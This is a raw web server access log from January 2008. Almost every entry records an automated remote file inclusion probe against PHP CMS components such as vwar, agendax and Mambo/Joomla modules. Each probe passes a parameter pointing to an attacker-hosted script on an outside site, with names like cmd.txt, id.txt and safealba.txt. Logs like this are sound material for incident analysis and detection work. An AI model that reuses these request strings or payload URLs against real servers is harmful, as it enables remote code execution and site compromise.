200.222.110.249 - - [13/Jan/2008:11:00:03 -0800] "GET /logs/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.bordon-slo.com/borda.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
200.222.110.249 - - [13/Jan/2008:11:00:04 -0800] "GET /modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.bordon-slo.com/borda.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
66.146.2.196 - - [13/Jan/2008:11:00:21 -0800] "GET /logs/index2.php?url_page=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.galf.org"
66.146.2.196 - - [13/Jan/2008:11:00:22 -0800] "GET /index2.php?url_page=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.galf.org"
85.119.217.23 - - [13/Jan/2008:11:00:36 -0800] "GET /logs/access_071105.log/vwar/admin/?vwar_root=http://www.boscolab.cl//boscolab_imagenes/donbosco2006_08.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
85.119.217.23 - - [13/Jan/2008:11:00:36 -0800] "GET /vwar/admin/?vwar_root=http://www.boscolab.cl//boscolab_imagenes/donbosco2006_08.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
85.119.217.23 - - [13/Jan/2008:11:00:36 -0800] "GET /logs/vwar/admin/?vwar_root=http://www.boscolab.cl//boscolab_imagenes/donbosco2006_08.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
146.83.144.170 - - [13/Jan/2008:11:01:15 -0800] "GET /logs/access_071210.log/modules/My_eGallery/index.php?basepath=http://www.fuori-corso.net/administration/d.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
146.83.144.170 - - [13/Jan/2008:11:01:20 -0800] "GET /modules/My_eGallery/index.php?basepath=http://www.fuori-corso.net/administration/d.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
146.83.144.170 - - [13/Jan/2008:11:01:20 -0800] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.fuori-corso.net/administration/d.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
83.168.205.154 - - [13/Jan/2008:11:02:52 -0800] "GET /logs/access_071231.log//components/com_simpleboard/image_upload.php?sbp=http://www.crewfuck.kit.net/eval/safealba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
83.168.205.154 - - [13/Jan/2008:11:03:06 -0800] "GET /logs/access_071231.log//components/com_simpleboard/image_upload.php?sbp=http://bobatka.info/modules/language/asc/asc/r7? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
83.168.205.154 - - [13/Jan/2008:11:03:11 -0800] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.crewfuck.kit.net/eval/safealba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.200.83.90 - - [13/Jan/2008:11:03:23 -0800] "GET /homepage.php?sel=http://www.surginet.info//modules/tinycontent/admin/spaw/.debug/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.galf.org"
74.200.83.90 - - [13/Jan/2008:11:03:23 -0800] "GET /logs/homepage.php?sel=http://www.surginet.info//modules/tinycontent/admin/spaw/.debug/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.galf.org"
208.80.193.38 - - [13/Jan/2008:11:03:33 -0800] "GET /labia23portugues/index.htm&sa=x&oi=translate&resnum=47&ct=result HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.0-rc5; i686 Linux; 20020207)" "www.galf.org"
74.52.170.162 - - [13/Jan/2008:11:04:00 -0800] "GET //modules/xfsection/modify.php?dir_module=http://claroline.lct-net.cl/www????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
85.119.217.23 - - [13/Jan/2008:11:04:07 -0800] "GET /logs/access_071217.log/vwar/admin/?vwar_root=http://www.boscolab.cl//boscolab_imagenes/donbosco2006_08.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
85.119.217.23 - - [13/Jan/2008:11:04:19 -0800] "GET /vwar/admin/?vwar_root=http://www.boscolab.cl//boscolab_imagenes/donbosco2006_08.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
89.218.85.18 - - [13/Jan/2008:11:04:25 -0800] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=http://www.freewebtown.com/darkscan/test.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
89.218.85.18 - - [13/Jan/2008:11:04:26 -0800] "GET //modules/4nAlbum/public/displayCategory.php?basepath=http://www.freewebtown.com/darkscan/test.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
88.191.35.198 - - [13/Jan/2008:11:04:32 -0800] "GET /logs/access_071217.log/vwar/admin/?vwar_root=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
146.83.144.170 - - [13/Jan/2008:11:04:33 -0800] "GET /logs/access_070826.log/modules/My_eGallery/index.php?basepath=http://www.fuori-corso.net/administration/d.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
207.58.187.94 - - [13/Jan/2008:11:04:55 -0800] "GET /logs/access.log/homepage.php?sel=http://www.fordtransit.org.uk//skins/gate_to_americana/.debug/contr.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
207.58.187.94 - - [13/Jan/2008:11:04:55 -0800] "GET /homepage.php?sel=http://www.fordtransit.org.uk//skins/gate_to_americana/.debug/contr.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
207.58.187.94 - - [13/Jan/2008:11:04:55 -0800] "GET /logs/homepage.php?sel=http://www.fordtransit.org.uk//skins/gate_to_americana/.debug/contr.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
207.58.187.94 - - [13/Jan/2008:11:04:55 -0800] "GET /logs/access_071231.log/homepage.php?sel=http://www.fordtransit.org.uk//skins/gate_to_americana/.debug/contr.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
69.10.135.176 - - [13/Jan/2008:11:04:57 -0800] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.asolutionsts.com/sugarcrm/id4.txt? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.galf.org"
69.10.135.176 - - [13/Jan/2008:11:04:57 -0800] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.asolutionsts.com/sugarcrm/id4.txt? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)" "www.galf.org"
64.62.170.7 - - [13/Jan/2008:11:05:41 -0800] "GET /logs//modules/agendax/addevent.inc.php?agendax_path=http://cpcruzdelrio.juntaextremadura.net/descargas/subidas/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
64.62.170.7 - - [13/Jan/2008:11:05:41 -0800] "GET //modules/agendax/addevent.inc.php?agendax_path=http://cpcruzdelrio.juntaextremadura.net/descargas/subidas/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
193.19.225.162 - - [13/Jan/2008:11:07:26 -0800] "GET /logs/access_071224.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=%20http://catzu.altervista.org/scantxt.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
91.121.64.166 - - [13/Jan/2008:11:07:27 -0800] "GET /logs//modules/agendax/addevent.inc.php?agendax_path=http://klein.no/UserFiles/Image/test/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
91.121.64.166 - - [13/Jan/2008:11:07:27 -0800] "GET //modules/agendax/addevent.inc.php?agendax_path=http://klein.no/UserFiles/Image/test/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
86.109.165.93 - - [13/Jan/2008:11:07:45 -0800] "GET /logs//modules/agendax/addevent.inc.php?agendax_path=http://theninjalegion.com/cmdasc.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
86.109.165.93 - - [13/Jan/2008:11:07:45 -0800] "GET //modules/agendax/addevent.inc.php?agendax_path=http://theninjalegion.com/cmdasc.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
74.52.170.162 - - [13/Jan/2008:11:08:11 -0800] "GET /logs/access_071001.log//?mosConfig_absolute_path=http://www.adevarat-games.com/douceur/mambots/.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
193.200.51.200 - - [13/Jan/2008:11:09:48 -0800] "GET /logs/index2.php?url_page=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.galf.org"
193.200.51.200 - - [13/Jan/2008:11:09:48 -0800] "GET /index2.php?url_page=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.galf.org"
67.15.12.20 - - [13/Jan/2008:11:09:56 -0800] "GET /logs/access_071105.log/vwar/admin/?vwar_root=http://claroline.lct-net.cl/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
67.15.12.20 - - [13/Jan/2008:11:10:02 -0800] "GET /vwar/admin/?vwar_root=http://claroline.lct-net.cl/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
67.15.12.20 - - [13/Jan/2008:11:10:02 -0800] "GET /logs/vwar/admin/?vwar_root=http://claroline.lct-net.cl/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
82.192.68.20 - - [13/Jan/2008:11:10:06 -0800] "GET /logs/access_071231.log/homepage.php?sel=http://www.fordtransit.org.uk//skins/gate_to_americana/.debug/contr.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
82.192.68.20 - - [13/Jan/2008:11:10:06 -0800] "GET /homepage.php?sel=http://www.fordtransit.org.uk//skins/gate_to_americana/.debug/contr.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
82.192.68.20 - - [13/Jan/2008:11:10:07 -0800] "GET /logs/homepage.php?sel=http://www.fordtransit.org.uk//skins/gate_to_americana/.debug/contr.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
74.200.79.215 - - [13/Jan/2008:11:10:11 -0800] "GET /logs/access.log/homepage.php?sel=http://www.laila.jp/item_pics/derf/a.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.200.79.215 - - [13/Jan/2008:11:10:11 -0800] "GET /homepage.php?sel=http://www.laila.jp/item_pics/derf/a.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.200.79.215 - - [13/Jan/2008:11:10:11 -0800] "GET /logs/homepage.php?sel=http://www.laila.jp/item_pics/derf/a.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.200.79.215 - - [13/Jan/2008:11:10:12 -0800] "GET /logs/access_071231.log/homepage.php?sel=http://www.laila.jp/item_pics/derf/a.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
62.75.168.187 - - [13/Jan/2008:11:10:26 -0800] "GET /logs//modules/agendax/addevent.inc.php?agendax_path=http://www.crewfuck.kit.net/eval/safealba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
62.75.168.187 - - [13/Jan/2008:11:10:26 -0800] "GET /logs//modules/agendax/addevent.inc.php?agendax_path=http://bobatka.info/modules/language/asc/asc/r7? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
62.75.168.187 - - [13/Jan/2008:11:10:27 -0800] "GET //modules/agendax/addevent.inc.php?agendax_path=http://www.crewfuck.kit.net/eval/safealba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
62.75.168.187 - - [13/Jan/2008:11:10:27 -0800] "GET //modules/agendax/addevent.inc.php?agendax_path=http://bobatka.info/modules/language/asc/asc/r7? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
82.192.68.20 - - [13/Jan/2008:11:10:30 -0800] "GET /logs/access.log/homepage.php?sel=http://www.fordtransit.org.uk//skins/gate_to_americana/.debug/contr.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
85.214.16.138 - - [13/Jan/2008:11:10:30 -0800] "GET /logs//modules/agendax/addevent.inc.php?agendax_path=http://www.crewfuck.kit.net/eval/safealba.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.galf.org"
85.214.16.138 - - [13/Jan/2008:11:10:31 -0800] "GET //modules/agendax/addevent.inc.php?agendax_path=http://www.crewfuck.kit.net/eval/safealba.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.galf.org"
62.75.168.187 - - [13/Jan/2008:11:10:31 -0800] "GET /logs//modules/agendax/addevent.inc.php?agendax_path=http://www.crewfuck.kit.net/eval/safealba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
62.75.168.187 - - [13/Jan/2008:11:10:31 -0800] "GET /logs//modules/agendax/addevent.inc.php?agendax_path=http://phila.wonbuddhism.info/bbs//skin/zero_vote/images/btn_black.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
62.75.168.187 - - [13/Jan/2008:11:10:32 -0800] "GET //modules/agendax/addevent.inc.php?agendax_path=http://www.crewfuck.kit.net/eval/safealba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
62.75.168.187 - - [13/Jan/2008:11:10:32 -0800] "GET //modules/agendax/addevent.inc.php?agendax_path=http://phila.wonbuddhism.info/bbs//skin/zero_vote/images/btn_black.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
72.29.68.248 - - [13/Jan/2008:11:10:34 -0800] "GET /logs/access.log/homepage.php?sel=http://www.laila.jp/item_pics/derf/ind0.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.29.68.248 - - [13/Jan/2008:11:10:34 -0800] "GET /homepage.php?sel=http://www.laila.jp/item_pics/derf/ind0.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.29.68.248 - - [13/Jan/2008:11:10:35 -0800] "GET /logs/homepage.php?sel=http://www.laila.jp/item_pics/derf/ind0.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.29.68.248 - - [13/Jan/2008:11:10:35 -0800] "GET /logs/access_071231.log/homepage.php?sel=http://www.laila.jp/item_pics/derf/ind0.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
216.187.66.133 - - [13/Jan/2008:11:10:45 -0800] "GET /logs/access.log/homepage.php?sel=http://www.moas.com.br/images/www.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
216.187.66.133 - - [13/Jan/2008:11:10:46 -0800] "GET /homepage.php?sel=http://www.moas.com.br/images/www.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
216.187.66.133 - - [13/Jan/2008:11:10:46 -0800] "GET /logs/homepage.php?sel=http://www.moas.com.br/images/www.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
216.187.66.133 - - [13/Jan/2008:11:10:46 -0800] "GET /logs/access_071231.log/homepage.php?sel=http://www.moas.com.br/images/www.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
62.245.170.43 - - [13/Jan/2008:11:10:48 -0800] "GET /logs//modules/agendax/addevent.inc.php?agendax_path=http://rltrac.com/newsletter/wp-content/themes/themesID?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
62.245.170.43 - - [13/Jan/2008:11:10:49 -0800] "GET //modules/agendax/addevent.inc.php?agendax_path=http://rltrac.com/newsletter/wp-content/themes/themesID?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
62.245.170.43 - - [13/Jan/2008:11:11:47 -0800] "GET /logs//modules/agendax/addevent.inc.php?agendax_path=http://www.geocities.com/mobileuser.02473235/dew/index.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
62.245.170.43 - - [13/Jan/2008:11:11:47 -0800] "GET //modules/agendax/addevent.inc.php?agendax_path=http://www.geocities.com/mobileuser.02473235/dew/index.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
67.15.12.20 - - [13/Jan/2008:11:11:50 -0800] "GET /logs/access_071001.log//?mosConfig_absolute_path=http://claroline.lct-net.cl/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
77.91.202.214 - - [13/Jan/2008:11:12:46 -0800] "GET /logs/access.log/homepage.php?sel=http://www.laila.jp/item_pics/derf/ind0.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
77.91.202.214 - - [13/Jan/2008:11:12:46 -0800] "GET /homepage.php?sel=http://www.laila.jp/item_pics/derf/ind0.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
77.91.202.214 - - [13/Jan/2008:11:12:46 -0800] "GET /logs/homepage.php?sel=http://www.laila.jp/item_pics/derf/ind0.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
77.91.202.214 - - [13/Jan/2008:11:12:47 -0800] "GET /logs/access_071231.log/homepage.php?sel=http://www.laila.jp/item_pics/derf/ind0.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
207.114.83.67 - - [13/Jan/2008:11:13:05 -0800] "GET /logs/access.log/homepage.php?sel=http://66.153.86.221/www?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
207.114.83.67 - - [13/Jan/2008:11:13:05 -0800] "GET /homepage.php?sel=http://66.153.86.221/www?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
207.114.83.67 - - [13/Jan/2008:11:13:05 -0800] "GET /logs/homepage.php?sel=http://66.153.86.221/www?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
207.114.83.67 - - [13/Jan/2008:11:13:05 -0800] "GET /logs/access_071231.log/homepage.php?sel=http://66.153.86.221/www?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
80.237.144.235 - - [13/Jan/2008:11:13:50 -0800] "GET /logs//modules/agendax/addevent.inc.php?agendax_path=http://www.crewfuck.kit.net/eval/safealba.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
80.237.144.235 - - [13/Jan/2008:11:13:50 -0800] "GET //modules/agendax/addevent.inc.php?agendax_path=http://www.crewfuck.kit.net/eval/safealba.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
217.160.188.198 - - [13/Jan/2008:11:14:07 -0800] "GET /logs//modules/agendax/addevent.inc.php?agendax_path=http://jspo.org/cache/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
217.160.188.198 - - [13/Jan/2008:11:14:08 -0800] "GET //modules/agendax/addevent.inc.php?agendax_path=http://jspo.org/cache/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
82.192.68.20 - - [13/Jan/2008:11:14:11 -0800] "GET /logs/access_071231.log/homepage.php?sel=http://test.drugfreedetroit.com/components/com_magazine/layouts/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
82.192.68.20 - - [13/Jan/2008:11:14:18 -0800] "GET /homepage.php?sel=http://test.drugfreedetroit.com/components/com_magazine/layouts/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
210.240.31.1 - - [13/Jan/2008:11:14:52 -0800] "GET /logs/access.log/homepage.php?sel=http://www.laila.jp/item_pics/derf/testi.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
210.240.31.1 - - [13/Jan/2008:11:14:52 -0800] "GET /homepage.php?sel=http://www.laila.jp/item_pics/derf/testi.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
210.240.31.1 - - [13/Jan/2008:11:14:53 -0800] "GET /logs/homepage.php?sel=http://www.laila.jp/item_pics/derf/testi.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
210.240.31.1 - - [13/Jan/2008:11:14:53 -0800] "GET /logs/access_071231.log/homepage.php?sel=http://www.laila.jp/item_pics/derf/testi.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
201.28.106.195 - - [13/Jan/2008:11:15:22 -0800] "GET /logs/access.log/homepage.php?sel=http://www.laila.jp/item_pics/derf/a.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
201.28.106.195 - - [13/Jan/2008:11:15:22 -0800] "GET /homepage.php?sel=http://www.laila.jp/item_pics/derf/a.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
201.28.106.195 - - [13/Jan/2008:11:15:23 -0800] "GET /logs/homepage.php?sel=http://www.laila.jp/item_pics/derf/a.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
201.28.106.195 - - [13/Jan/2008:11:15:23 -0800] "GET /logs/access_071231.log/homepage.php?sel=http://www.laila.jp/item_pics/derf/a.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
122.132.140.60 - - [13/Jan/2008:11:15:32 -0800] "GET /logs/index2.php?x=http://www.velaborg.is//components/com_smd/machi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
122.132.140.60 - - [13/Jan/2008:11:15:38 -0800] "GET /index2.php?x=http://www.velaborg.is//components/com_smd/machi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
82.192.68.20 - - [13/Jan/2008:11:15:51 -0800] "GET /logs/access.log/homepage.php?sel=http://test.drugfreedetroit.com/components/com_magazine/layouts/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
67.15.12.20 - - [13/Jan/2008:11:16:00 -0800] "GET /logs/access_071217.log/vwar/admin/?vwar_root=http://claroline.lct-net.cl/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
66.98.184.21 - - [13/Jan/2008:11:17:39 -0800] "GET /logs/access.log/homepage.php?sel=http://www.laila.jp/item_pics/derf/ind0.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
66.98.184.21 - - [13/Jan/2008:11:17:40 -0800] "GET /homepage.php?sel=http://www.laila.jp/item_pics/derf/ind0.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
66.98.184.21 - - [13/Jan/2008:11:17:41 -0800] "GET /logs/homepage.php?sel=http://www.laila.jp/item_pics/derf/ind0.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
66.98.184.21 - - [13/Jan/2008:11:17:41 -0800] "GET /logs/access_071231.log/homepage.php?sel=http://www.laila.jp/item_pics/derf/ind0.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
74.52.92.210 - - [13/Jan/2008:11:19:17 -0800] "GET /logs/access_071008.log/index.php?p=http://sbn.poilpark.net/docu/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
74.52.92.210 - - [13/Jan/2008:11:19:18 -0800] "GET /index.php?p=http://sbn.poilpark.net/docu/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
74.52.92.210 - - [13/Jan/2008:11:19:18 -0800] "GET /logs/index.php?p=http://sbn.poilpark.net/docu/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
85.128.204.2 - - [13/Jan/2008:11:20:05 -0800] "GET /logs/access_071231.log//?mosConfig_absolute_path=http://www.freewebs.com/haramitel/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.galf.org"
85.128.204.2 - - [13/Jan/2008:11:20:05 -0800] "GET //?mosConfig_absolute_path=http://www.freewebs.com/haramitel/id.txt? HTTP/1.1" 200 1048 "-" "libwww-perl/5.64" "www.galf.org"
85.128.204.2 - - [13/Jan/2008:11:20:06 -0800] "GET /logs//?mosConfig_absolute_path=http://www.freewebs.com/haramitel/id.txt? HTTP/1.1" 200 5478 "-" "libwww-perl/5.64" "www.galf.org"
200.206.143.90 - - [13/Jan/2008:11:20:59 -0800] "GET /logs/access_071231.log/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.telefuglehund.org/__gjestebok/hdguestbook/data/djd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
200.206.143.90 - - [13/Jan/2008:11:20:59 -0800] "GET /components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.telefuglehund.org/__gjestebok/hdguestbook/data/djd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
200.206.143.90 - - [13/Jan/2008:11:21:00 -0800] "GET /logs/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.telefuglehund.org/__gjestebok/hdguestbook/data/djd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
83.201.28.140 - - [13/Jan/2008:11:21:11 -0800] "GET /logs/access_070618.log/modules/My_eGallery/index.php?basepath=http://www.freewebtown.com/darkscan/test.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.galf.org"
83.201.28.140 - - [13/Jan/2008:11:21:11 -0800] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.freewebtown.com/darkscan/test.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.galf.org"
83.201.28.140 - - [13/Jan/2008:11:21:43 -0800] "GET /logs/access_070826.log/modules/My_eGallery/index.php?basepath=http://www.freewebtown.com/darkscan/test.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.galf.org"
64.62.170.7 - - [13/Jan/2008:11:22:10 -0800] "GET /logs//components/minibb/index.php?absolute_path=http://cpcruzdelrio.juntaextremadura.net/descargas/subidas/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
64.62.170.7 - - [13/Jan/2008:11:22:10 -0800] "GET //components/minibb/index.php?absolute_path=http://cpcruzdelrio.juntaextremadura.net/descargas/subidas/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
83.201.28.140 - - [13/Jan/2008:11:22:27 -0800] "GET /logs/access_071015.log/forums/chat//inc/cmses/aedating4CMS.php?dir%5Binc%5D=http://www.freewebtown.com/darkscan/test.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.galf.org"
83.201.28.140 - - [13/Jan/2008:11:22:28 -0800] "GET /logs/forums/chat//inc/cmses/aedating4CMS.php?dir%5Binc%5D=http://www.freewebtown.com/darkscan/test.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.galf.org"
193.28.153.174 - - [13/Jan/2008:11:22:36 -0800] "GET //components/com_rsgallery2/rsgallery2.html.php?mosConfig_absolute_path=http://www.q8x.info/blog/wp-content/themes/pink-kupy-10/117.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.galf.org"
193.28.153.174 - - [13/Jan/2008:11:22:36 -0800] "GET /logs//components/com_rsgallery2/rsgallery2.html.php?mosConfig_absolute_path=http://www.q8x.info/blog/wp-content/themes/pink-kupy-10/117.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.galf.org"
67.15.12.20 - - [13/Jan/2008:11:22:43 -0800] "GET //modules/xfsection/modify.php?dir_module=http://claroline.lct-net.cl/claroline/errors.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
69.10.135.176 - - [13/Jan/2008:11:22:48 -0800] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.fachin-friedrich.de/contenido/external/frontend/me.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
69.10.135.176 - - [13/Jan/2008:11:22:48 -0800] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.fachin-friedrich.de/contenido/external/frontend/me.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
